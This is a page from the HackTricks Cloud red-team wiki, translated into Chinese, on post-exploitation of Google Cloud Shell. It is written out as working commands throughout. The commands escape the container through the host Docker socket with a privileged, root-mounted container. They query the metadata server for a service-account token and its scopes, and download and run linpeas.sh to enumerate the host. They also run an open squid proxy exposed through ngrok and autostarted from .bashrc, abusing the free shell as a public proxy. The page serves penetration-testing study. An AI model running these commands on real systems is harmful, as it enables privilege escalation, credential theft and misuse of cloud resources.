GCP - Cloud Shell Post Exploitation

学习并练习AWS Hacking：HackTricks培训AWS红队专家（ARTE） 学习并练习GCP Hacking: HackTricks培训GCP红队专家（GRTE）

支持HackTricks

检查订阅计划!
加入 💬 Discord群组 或 电报群组 或关注我们的Twitter 🐦 @hacktricks_live.
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享黑客技巧。

云Shell

有关云Shell的更多信息，请查看：

容器逃逸

请注意，Google Cloud Shell在容器内运行，您可以通过以下方式轻松逃逸到主机：

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

这并不被谷歌视为漏洞，但它让你对环境中正在发生的事情有了更广泛的视野。

此外，请注意，从主机上你可以找到一个服务账号令牌：

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

具有以下范围：

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

使用LinPEAS枚举元数据：

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

使用 https://github.com/carlospolop/bf_my_gcp_permissions 使用服务账号的令牌后未发现任何权限...

用作代理

如果您想将您的 Google 云 Shell 实例用作代理，您需要运行以下命令（或将它们插入到 .bashrc 文件中）:

sudo apt install -y squid

只是为了让你知道，Squid是一个HTTP代理服务器。创建一个名为squid.conf的文件，并添加以下设置：

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

将 squid.conf 文件复制到 /etc/squid

sudo cp squid.conf /etc/squid

最后运行squid服务：

sudo service squid start

使用 ngrok 让代理可以从外部访问：

./ngrok tcp 3128

在运行后复制tcp://网址。如果要从浏览器运行代理，建议删除tcp://部分和端口，并将端口放入浏览器代理设置的端口字段中（squid是一个http代理服务器）。

为了在启动时更好地使用，.bashrc文件应包含以下行：

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

指令已从https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key复制。查看该页面获取其他疯狂想法，在Cloud Shell中运行任何类型的软件（包括数据库甚至Windows）。

学习并实践AWS Hacking：HackTricks 培训 AWS 红队专家 (ARTE) 学习并实践GCP Hacking: HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

检查订阅计划!
加入 💬 Discord 群组 或 电报群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向HackTricks和HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

PreviousGCP - Cloud Run Post Exploitation NextGCP - Cloud SQL Post Exploitation

Last updated 1 month ago